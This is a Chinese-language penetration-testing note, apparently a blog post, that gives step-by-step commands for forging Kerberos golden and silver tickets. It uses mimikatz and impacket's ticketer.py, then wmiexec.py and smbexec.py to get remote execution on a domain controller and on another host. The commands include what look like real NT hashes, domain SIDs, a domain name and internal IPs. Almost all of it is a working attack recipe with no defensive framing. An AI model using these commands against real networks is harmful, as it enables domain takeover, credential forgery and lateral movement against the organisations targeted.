一、使用mimikatz制作票据
1
|
kerberos::golden /user:administrator /domain:unicode.org /sid:S-1-5-21-165017151-3123059220-25911706310 /krbtgt:xxx /ticket:admin.tck /ptt
|
注入票据
1
|
kerberos::tgt admin.tck
|
注意:拿到票据之后注入内存,使用sc之类的服务的情况下使用主机名即可走域认证,使用IP走ntlm认证。
清除票据
二、impakect
制作票据:
1
|
python3 ticketer.py -nthash 1caee7a5d22ec1b4a20d1c6d72cdfbf1 -domain-sid S-1-5-21-3428754558-1783579842-1599308265 -domain central.com.br administrator
|
-nthash为krbgtg的hash。
-domain-sid为域SID,即域用户ID减去用户部分。
设置临时环境变量(windows):
1
|
set KRB5CCNAME=C:\Users\aa\Desktop\剑客\内网渗透\impacket-master\impacket-master\examples
|
linux:
1
|
export KRB5CCNAME=/pentest/impacket/examples/administrator.ccache
|
使用黄金票据去访问DC
1
|
python3 wmiexec.py -k -no-pass -dc-ip 192.168.100.242 -debug SV-ERP0001
|
-dc-ip 为域控的用户名,目标必须是机器名,如果是本地需要配置host。
制作银票
1
|
python ticketer.py -nthash 305914b9bdab214a3cf72a238e8d0463 -domain-sid S-1-5-21-3428754558-1783579842-1599308265 -domain central.com.br -spn CIFS/SV-ERP0001 administrator
|
-nthash为试图访问目标的机器用户hash。
-spn为试图访问服务的spn。CIFS/WIN10.unicode.org/ CIFS/WIN10
1
|
python3 ticketer.py -nthash 305914b9bdab214a3cf72a238e8d0463 -domain-sid S-1-5-21-3428754558-1783579842-1599308265 -domain central.com.br -spn CIFS/SV-ERP0001 administrator
|
使用smbclient.py访问目标
1
|
python3 smbexec.py -k -no-pass SV-ERP0001 -target-ip 192.168.100.16
|
[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
